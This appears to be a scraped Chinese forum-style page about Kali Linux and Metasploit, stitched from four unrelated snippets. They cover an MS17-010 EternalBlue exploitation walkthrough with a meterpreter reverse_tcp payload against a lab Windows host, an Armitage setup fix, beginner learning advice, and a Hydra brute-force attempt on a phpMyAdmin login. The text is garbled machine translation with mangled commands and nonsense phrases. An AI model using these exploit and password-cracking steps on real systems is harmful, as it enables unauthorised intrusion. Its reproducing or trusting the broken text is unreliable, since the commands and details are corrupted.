kali msf 抓包分析 - 经验交流

kali你有没有分享Linux渗透测试安全牛的课程kali你对Linux有什么体验kali你可以满足一切。当您使用root/passwd登录时，桌面上会出现kalibeast，点按左侧收藏栏中的Emacs，装牛逼，在Emacs里打代码，各种导入，然后输入Mxmultiterm ，神秘输入msfconsole，KaliLinux是高级渗透测试和安全审计的Linux发行版。

1、ms17010漏洞利用 msf|2019-03-27ms070-0x01实验环境攻击飞行器:kaliLinux IP: 10.10.131目标机器:Windows 2008R2IP: 10.10.1320x02配置漏洞利用msf>使用漏洞利用。ms17 _ 010 _ eternal bluemsfexploit(ms17 _ 010 _ eternal blue)> set rhost 10 . 10 . 132 rhost > 10 . 10 . 132查看选项msfexp 。注意:选项中指定了该漏洞对应的目标系统，因此并非所有存在该漏洞的系统都能利用该漏洞；0x03配置payloadpayload，只需要配置监听返回会话的IP即可；msfexploit(ms17 _ 010 _ eternal blue)> setpayload windows/x64/meter preter/reverse _ tcppayload > windows/x64/.

2、KALIlinux2.0升级后armitage等链接上,但是扫描不了漏洞,如图安装kali2.0后，测试是否可以启动。重启postgresql服务，初始化msfdb，点击armitage提示连接错误。kali2.0会变得特别卡。我们来看看解决方案。然后下载linux平台的压缩包。下载后，将下载的文件解压到/usr/share/目录。(可以先删除原来的armitage文件夹。

3、作为小白如何学习Kalilinux渗透测试技术【kali msf 抓包分析】首先你需要明白学习卡莉的目的是什么。其次，你需要明白什么是kali 。其实你不想学kali 。你就是想当黑客kali 。只是一个集成了各种渗透工具的linux操作系统。你可能想学习渗透技能，你也是个不错的黑客吧？建议你先从基础入手，比如漏洞是如何形成的，然后是如何被利用。比如SQL注入漏洞。

4、使用 kaliHydra暴力破解phpadmin网站(失败一个未受保护的phpadmin背景。在github上查找字典，或者使用kali和它自己的字典，使用burp 抓包查找url和错误信息。有一点一直困扰我很久，第一次扫描不成功是因为只写了ip没有改端口。结果我一直在扫描一个404页面。s选项可以更改端口。最终命令:hydraltop 20 _ admin _ users.txtpfastpwds.txtt4ensfs88xx.xx.xx.xxhttpPostform/XXX: XXX用户